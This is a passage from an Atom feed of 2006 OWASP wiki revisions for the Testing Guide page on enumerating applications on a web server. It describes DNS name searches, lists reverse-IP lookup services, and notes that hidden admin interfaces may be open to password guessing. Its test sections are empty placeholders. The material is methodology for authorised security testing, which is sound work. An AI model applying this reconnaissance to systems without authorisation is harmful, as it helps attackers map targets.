This kind of search is akin to DNS zone transfer, but relies on web-based services which allow to perform name-based searched on DNS. One such a service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com''. Then you will check whether the names you obtained are pertaining to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There is a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;br&amp;gt;&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;br&amp;gt;&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;br&amp;gt;&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;br&amp;gt;&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;br&amp;gt;&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered the most information you can with the previous techniques, you can rely on search engines to possibly refine and increment your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11824</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11824"/>
				<updated>2006-11-06T08:06:30Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Description of the Issue */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a Web presence is to find out which particular applications are hosted on a Web Server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies than can be exploited in order to gain remote control and/or data exploitation.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this many applications are often hosted on a particular web server without reference from the main website: this is true for internal and/or extranet website which could be misconfigured or not updated due to the perception they're used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
In addition to this many application use common path for administrative interfaces which can be used to guess or bruteforce administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is loosing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or maybe just one) as a target to test. No other knowledge. It is arguable that this setting is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things...). The problem is, the given IP address hosts an http service on port 80, but if you access it specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a bunch of web applications, associated to unrelated symbolic (DNS) names. Obviously the extent of your analysis is deeply affected by the fact that you test the applications, or you do not - because you don't notice them, or you notice only SOME of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed out a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even being aware of that! (this is more likely to happen in large organizations).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Testing for Topic X vulnerabilities:''' &amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	</feed>